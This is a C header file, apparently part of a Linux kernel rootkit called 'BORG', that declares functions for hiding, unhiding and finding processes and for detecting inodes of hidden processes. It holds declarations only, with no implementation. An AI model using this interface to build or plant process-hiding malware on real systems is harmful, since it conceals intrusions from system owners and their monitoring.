/**
 * @file process.h
 * @brief Hide processes.
 */
#ifndef __BORG_PROCESS_H
#define __BORG_PROCESS_H

/** Flag for hidden process. */
#define BORG_HIDDEN_PROCESS	0x10000000

/** Loop tasks. */
#define for_each_task(p)	for(p = init_hook; (p = next_task(p)) != init_hook;)

/**
 * Find the task_struct of init.
 */
extern void set_init_hook(void);

/**
 * Hide a process.
 * @param pid The process to hide.
 */
void process_hide(pid_t pid);

/**
 * Unhide a process.
 * @param pid The process to unhide.
 */
void process_unhide(pid_t pid);

/**
 * Check if an inode belongs to a hidden process.
 * @param ino The inode to search for.
 * @return Zero if not hidden, and 1 if hidden.
 */
int process_hidden_has_inode(unsigned long ino);

/**
 * Find a process.
 * @param pid The process to find.
 * @return Task_struct pointer on success and NULL on failure.
 */
struct task_struct * process_find(pid_t pid);

/**
 * Check if a process is hidden.
 * @param pid The process to check.
 * @return 1 if hidden and 0 if not.
 */
int process_is_hidden(pid_t pid);

#endif
